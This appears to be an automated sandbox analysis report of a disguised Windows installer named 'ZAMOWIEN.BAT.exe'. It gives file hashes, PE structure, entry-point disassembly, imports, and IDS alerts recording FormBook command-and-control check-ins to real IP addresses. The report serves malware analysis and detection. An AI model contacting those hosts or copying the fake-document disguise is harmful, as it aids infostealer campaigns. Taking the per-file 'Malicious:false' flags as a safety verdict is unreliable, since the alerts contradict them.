                                                                                SSDEEP:6144:dVc1bEgTtgauMx5TpbosVy+1vBQPtvkIFCKv:dVc1bAauMx5TY2vBCJkVKv
                                                                                MD5:DC67E86D727F70C1A49B6499EBECCE54
                                                                                SHA1:C5B8A90EF31EA75CFAF0DE681DBA81511AEA054E
                                                                                SHA-256:D8A7B7A3AC5834C32B051409D623D69A71C33B8A47FD9051F6625E4D215CCEC7
                                                                                SHA-512:571C28F1E0518F7F9F5A4290A7DC56CBC14426C5FD8FE0A44A758AE611BC7B8E925E8C5CB916E17244FBBDA8C24BAB945C1DA6A492702AC0FF85FBBB4A504634
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):115358
                                                                                Entropy (8bit):2.675745846616557
                                                                                Encrypted:false
                                                                                SSDEEP:1536:cJlovKnLuGpQg1gIJ4VmMUqL00JI1DsLl7LrJ4JbGB:OouXSeyB
                                                                                MD5:B85C88335452D4735933A9D051C6AB9B
                                                                                SHA1:C8F25867B38705E3CD11DBC736B6F55F96D02B44
                                                                                SHA-256:4106FF2EEA4EC90608E4CFEAB4C317AC947D997543011FFBCBC20B90860F1A7F
                                                                                SHA-512:67A3A812498D84AE484DBBB27A52877442D953CD1DE097D36FBE6CBDC3C2B8200CC81249504B8FBA408201EEECF315E3C4224EB554C9C10E205EFD8CA3EBB8AA
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):455315
                                                                                Entropy (8bit):1.2477113828127742
                                                                                Encrypted:false
                                                                                SSDEEP:1536:o/yCFoEvvG0yx5hyNnuPwAVpwtCTuOf9aSDAUg:o/2Enyx5+uPwAnwMSADAUg
                                                                                MD5:761F2A757CD380F71E205335CE088495
                                                                                SHA1:7E1C38708629925DF64A30EB0B722A7C44FA6150
                                                                                SHA-256:56A1E386A92086888D3C0F9437CC34AACFF1AF55D59A0393EEBC220D4BC2697B
                                                                                SHA-512:5DB2A3E96E93E576E861F10296DB05ED890311EE2F31D930B330DCB418246C9E3C750272CCB781811B3C8BFAD940ACAB64040F72786DE4A839C7238B984E2E02
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 2000x2000, components 3
                                                                                Category:dropped
                                                                                Size (bytes):165466
                                                                                Entropy (8bit):6.5947581943238625
                                                                                Encrypted:false
                                                                                SSDEEP:3072:b9bANrxjToG8aMvWDtSYT8TBs9M/U2UKEVKQUsLNcY/:Sxj5AeyBN/U2L6KQfNZ
                                                                                MD5:152B2AA9B4B656DF132C2E5EAD37A7D5
                                                                                SHA1:9C0FDBAAB3A483D4857BB8A2269CD21177BBD1D9
                                                                                SHA-256:11970E0E0D67A2FD31BD5907E279F43F52A3B2547391FF843B52BF79062CA00F
                                                                                SHA-512:4D756CC91321FD2646D5383E3EC3F736BA2B59DD46C912D9D28CD67858A4FA9A6E2FD8312F91D1EEA4392B01830DDD1F59B40353265D0B9CA84F7DA2D62F2E10
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):321960
                                                                                Entropy (8bit):1.240482616634199
                                                                                Encrypted:false
                                                                                SSDEEP:768:phtcv5KE3yqV0L8Xi1Sk4gVNBo/iZcRxZq129cB/ckCkoPtvb292Qrg/Bt2bNsQe:utkxDPfCkoGBdszPmWJqU
                                                                                MD5:66087BEC9068998EE8F271F0580AB3F5
                                                                                SHA1:80980F5A1BD6DAF01263730273F945B031F75AE3
                                                                                SHA-256:248D9672E365A5C58F1AF62BA50E7FA4BFCF518846DA63ACA19797201C9E5F44
                                                                                SHA-512:046A00F3DB8C6A5C2BD71A43D13FEC6418AA0E30EA77CA12BEB082F8EDCFF9D3F31BCAD7B40A6D02722F5092215279681A96E103503063A52786314D21FE83FD
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):263192
                                                                                Entropy (8bit):1.2599632446975992
                                                                                Encrypted:false
                                                                                SSDEEP:768:XWXGdC9WRz+JhP7he1s7N4PjZlGpwlN8HmDEh/jTqcx1uNp9ieDc0VSLrPSsGCCu:IGdVcNN49lGp5UibEBfJv
                                                                                MD5:0EDAE6068FC853ECD4597C0C717729E8
                                                                                SHA1:8F02F7B5B9524451D3E2FA336B898883E8707FEA
                                                                                SHA-256:FA5E6764D56E5EBCB89C97A192ADF8F246D7E3C5683A5864C7A8714DD977210C
                                                                                SHA-512:EF8D9006A9FC63F31F6677C6500C8C9AD13CDCF45F76AAB2EAD30CE98DD223D87782DC29869B9D3C7C0729320DF341CF25F384F0EC775A8F4EA6F5BEA101EC2D
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):38
                                                                                Entropy (8bit):4.006841738213845
                                                                                Encrypted:false
                                                                                SSDEEP:3:kQMicv7Wz+v:clvSz+v
                                                                                MD5:8674B487F44FE91156094E810B1A3128
                                                                                SHA1:27F1EB1FBAFFBD6AF90FD2F084081BD4A96E9498
                                                                                SHA-256:4F0B489724F53D0E8C6BFE50C9EA02251EEBDD7A96855091C2F6E8768F683E5D
                                                                                SHA-512:4AE1B103E5E58D5EEA6EC6DB2E4DA96557B88C32CE6860E9B2986C628DD26B95162261F33E6036388184FFA5256B45BE91BE7E8C9DA85BD5945E29F2360D19E9
                                                                                Malicious:false
                                                                                Preview:[parsimoniously]..Vesigia=unassessed..
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                Entropy (8bit):7.171521399678043
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:ZAMOWIEN.BAT.exe
                                                                                File size:974'630 bytes
                                                                                MD5:936fd06cf63ed725bdb6bc4c83bed228
                                                                                SHA1:ce4ec27a6a48dd8be5879bbdaf90cc3bda91a3a5
                                                                                SHA256:c41569f8bec1ed93da1978dbf2d97005a7db32ccb9d526ee17a6c7027fc6fc8c
                                                                                SHA512:8605a5eb9b103219808d3b578b8a7053d89c8ac91228fea591f6fe4e505b3ac5ee6bb8beaa2af6eaed73093191ef7219f61ea15b1efb5d1b9c0ebf1e7742ed45
                                                                                SSDEEP:24576:oewAoAZIk1OhCPilf4anx7eqAtxQUsHVSm:CAFLEmilfb5eqOxQhHs
                                                                                TLSH:9E25C006FB58C787C2EA6E7449F6B7452A3DCBC99CC38B02E54968D8F670F1874C9684
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....oZ.................d...*.....
                                                                                Icon Hash:c5cdc989d5cde097
                                                                                Entrypoint:0x403359
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x5A6FED2E [Tue Jan 30 03:57:34 2018 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                Instruction
                                                                                sub esp, 000002D4h
                                                                                push ebx
                                                                                push esi
                                                                                push edi
                                                                                push 00000020h
                                                                                pop edi
                                                                                xor ebx, ebx
                                                                                push 00008001h
                                                                                mov dword ptr [esp+14h], ebx
                                                                                mov dword ptr [esp+10h], 0040A2E0h
                                                                                mov dword ptr [esp+1Ch], ebx
                                                                                call dword ptr [004080A8h]
                                                                                call dword ptr [004080A4h]
                                                                                and eax, BFFFFFFFh
                                                                                cmp ax, 00000006h
                                                                                mov dword ptr [0042A20Ch], eax
                                                                                je 00007FA459022753h
                                                                                push ebx
                                                                                call 00007FA459025A05h
                                                                                cmp eax, ebx
                                                                                je 00007FA459022749h
                                                                                push 00000C00h
                                                                                call eax
                                                                                mov esi, 004082B0h
                                                                                push esi
                                                                                call 00007FA45902597Fh
                                                                                push esi
                                                                                call dword ptr [00408150h]
                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                cmp byte ptr [esi], 00000000h
                                                                                jne 00007FA45902272Ch
                                                                                push 0000000Ah
                                                                                call 00007FA4590259D8h
                                                                                push 00000008h
                                                                                call 00007FA4590259D1h
                                                                                push 00000006h
                                                                                mov dword ptr [0042A204h], eax
                                                                                call 00007FA4590259C5h
                                                                                cmp eax, ebx
                                                                                je 00007FA459022751h
                                                                                push 0000001Eh
                                                                                call eax
                                                                                test eax, eax
                                                                                je 00007FA459022749h
                                                                                or byte ptr [0042A20Fh], 00000040h
                                                                                push ebp
                                                                                call dword ptr [00408044h]
                                                                                push ebx
                                                                                call dword ptr [004082A0h]
                                                                                mov dword ptr [0042A2D8h], eax
                                                                                push ebx
                                                                                lea eax, dword ptr [esp+34h]
                                                                                push 000002B4h
                                                                                push eax
                                                                                push ebx
                                                                                push 004216A8h
                                                                                call dword ptr [00408188h]
                                                                                push 0040A2C8h
                                                                                Programming Language:
                                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                                Name | Virtual Address | Virtual Size | Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x50000 | 0x5ab18 | .rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                .text | 0x1000 | 0x62a5 | 0x6400 | f4cff166abb4376522cf86cbd302f644 | False | 0.658984375 | data | 6.431390019180314 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata | 0x8000 | 0x138e | 0x1400 | 2914bac53cd4485c9822093463e4eea6 | False | 0.4509765625 | data | 5.146454805063938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data | 0xa000 | 0x20318 | 0x600 | 7d0d44c89e64b001096d8f9c60b1ac1b | False | 0.4928385416666667 | data | 3.90464114821524 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .ndata | 0x2b000 | 0x25000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc | 0x50000 | 0x5ab18 | 0x5ac00 | 8e289f0503c71e1dae735f54bd537b3d | False | 0.3740799328512397 | data | 4.762577612489826 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x504a8 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | English | United States | 0.35952525372074445
RT_ICON | 0x924d0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.3869188453803383
RT_ICON | 0xa2cf8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.5096473029045643
RT_ICON | 0xa52a0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.6343808630393997
RT_ICON | 0xa6348 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.5815565031982942
RT_ICON | 0xa71f0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.6877049180327869
RT_ICON | 0xa7b78 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.723826714801444
RT_ICON | 0xa8420 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | English | United States | 0.6359447004608295
RT_ICON | 0xa8ae8 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | English | United States | 0.2725609756097561
RT_ICON | 0xa9150 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.4602601156069364
RT_ICON | 0xa96b8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.7606382978723404
RT_ICON | 0xa9b20 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.34139784946236557
RT_ICON | 0xa9e08 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 0 | English | United States | 0.39549180327868855
RT_ICON | 0xa9ff0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.44594594594594594
RT_DIALOG | 0xaa118 | 0xb8 | data | English | United States | 0.6467391304347826
RT_DIALOG | 0xaa1d0 | 0x144 | data | English | United States | 0.5216049382716049
RT_DIALOG | 0xaa318 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0xaa418 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0xaa538 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0xaa598 | 0xca | data | English | United States | 0.5792079207920792
RT_VERSION | 0xaa668 | 0x21c | data | English | United States | 0.5314814814814814
RT_MANIFEST | 0xaa888 | 0x290 | XML 1.0 document, ASCII text, with very long lines (656), with no line terminators | English | United States | 0.5625
DLL | Import
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T11:54:45.212490+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49806 | 208.91.197.27 | 80 | TCP
2024-11-25T11:54:45.212490+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49749 | 13.248.169.48 | 80 | TCP
2024-11-25T11:54:45.212490+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49807 | 208.91.197.27 | 80 | TCP
2024-11-25T11:54:45.212490+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49808 | 208.91.197.27 | 80 | TCP
2024-11-25T11:54:45.212490+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49756 | 208.91.197.27 | 80 | TCP
2024-11-25T11:54:45.212490+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49755 | 208.91.197.27 | 80 | TCP
2024-11-25T11:54:45.212490+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49789 | 13.248.169.48 | 80 | TCP
2024-11-25T11:54:45.212490+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49798 | 13.248.169.48 | 80 | TCP
2024-11-25T11:54:45.212490+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49757 | 208.91.197.27 | 80 | TCP
2024-11-25T11:56:55.967429+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49741 | 103.83.194.50 | 80 | TCP
2024-11-25T11:57:26.782948+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49742 | 195.110.124.133 | 80 | TCP
2024-11-25T11:57:42.267241+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49743 | 172.67.145.234 | 80 | TCP
2024-11-25T11:57:44.895063+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49744 | 172.67.145.234 | 80 | TCP
2024-11-25T11:57:47.526021+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49745 | 172.67.145.234 | 80 | TCP
2024-11-25T11:57:50.161110+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49746 | 172.67.145.234 | 80 | TCP
2024-11-25T11:57:55.495788+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49747 | 13.248.169.48 | 80 | TCP
2024-11-25T11:57:58.132050+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49748 | 13.248.169.48 | 80 | TCP
2024-11-25T11:58:03.411981+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49750 | 13.248.169.48 | 80 | TCP
2024-11-25T11:58:09.222705+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49751 | 31.31.196.177 | 80 | TCP
2024-11-25T11:58:11.966222+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49752 | 31.31.196.177 | 80 | TCP
2024-11-25T11:58:14.713888+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49753 | 31.31.196.177 | 80 | TCP
2024-11-25T11:58:17.449975+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49754 | 31.31.196.177 | 80 | TCP
2024-11-25T11:58:40.408404+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49758 | 208.91.197.27 | 80 | TCP
2024-11-25T11:58:47.583285+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49759 | 8.210.46.21 | 80 | TCP
2024-11-25T11:58:50.451907+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49760 | 8.210.46.21 | 80 | TCP
2024-11-25T11:58:53.292980+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49761 | 8.210.46.21 | 80 | TCP
2024-11-25T11:58:56.102812+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49762 | 8.210.46.21 | 80 | TCP
2024-11-25T11:59:01.910298+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49763 | 154.88.22.105 | 80 | TCP
2024-11-25T11:59:04.730265+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49764 | 154.88.22.105 | 80 | TCP
2024-11-25T11:59:07.559152+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49765 | 154.88.22.105 | 80 | TCP
2024-11-25T11:59:10.375169+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49766 | 154.88.22.105 | 80 | TCP
2024-11-25T11:59:16.466040+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49767 | 43.155.76.124 | 80 | TCP
2024-11-25T11:59:19.296293+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49768 | 43.155.76.124 | 80 | TCP
2024-11-25T11:59:22.149584+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49769 | 43.155.76.124 | 80 | TCP
2024-11-25T11:59:24.984610+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49770 | 43.155.76.124 | 80 | TCP
2024-11-25T11:59:30.448709+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49771 | 66.29.149.46 | 80 | TCP
2024-11-25T11:59:33.126531+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49772 | 66.29.149.46 | 80 | TCP
2024-11-25T11:59:35.818839+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49773 | 66.29.149.46 | 80 | TCP
2024-11-25T11:59:38.501517+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49774 | 66.29.149.46 | 80 | TCP
2024-11-25T11:59:44.169087+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49775 | 81.88.58.216 | 80 | TCP
2024-11-25T11:59:46.886019+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49776 | 81.88.58.216 | 80 | TCP
2024-11-25T11:59:49.604023+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49777 | 81.88.58.216 | 80 | TCP
2024-11-25T11:59:52.319964+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49778 | 81.88.58.216 | 80 | TCP
2024-11-25T11:59:57.977751+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49779 | 104.21.27.59 | 80 | TCP
2024-11-25T12:00:00.604309+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49780 | 104.21.27.59 | 80 | TCP
2024-11-25T12:00:03.227728+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49781 | 104.21.27.59 | 80 | TCP
2024-11-25T12:00:05.860877+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49782 | 104.21.27.59 | 80 | TCP
2024-11-25T12:00:11.407437+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49783 | 45.81.23.25 | 80 | TCP
2024-11-25T12:00:14.114086+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49784 | 45.81.23.25 | 80 | TCP
2024-11-25T12:00:16.821997+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49785 | 45.81.23.25 | 80 | TCP
2024-11-25T12:00:19.517988+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49786 | 45.81.23.25 | 80 | TCP
2024-11-25T12:00:33.001844+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49787 | 13.248.169.48 | 80 | TCP
2024-11-25T12:00:35.628618+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49788 | 13.248.169.48 | 80 | TCP
2024-11-25T12:00:40.908404+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49790 | 13.248.169.48 | 80 | TCP
2024-11-25T12:00:57.538289+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49791 | 195.110.124.133 | 80 | TCP
2024-11-25T12:01:03.194457+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49792 | 172.67.145.234 | 80 | TCP
2024-11-25T12:01:05.526905+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49793 | 172.67.145.234 | 80 | TCP
2024-11-25T12:01:08.454141+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49794 | 172.67.145.234 | 80 | TCP
2024-11-25T12:01:10.756632+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49795 | 172.67.145.234 | 80 | TCP
2024-11-25T12:01:15.979446+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49796 | 13.248.169.48 | 80 | TCP
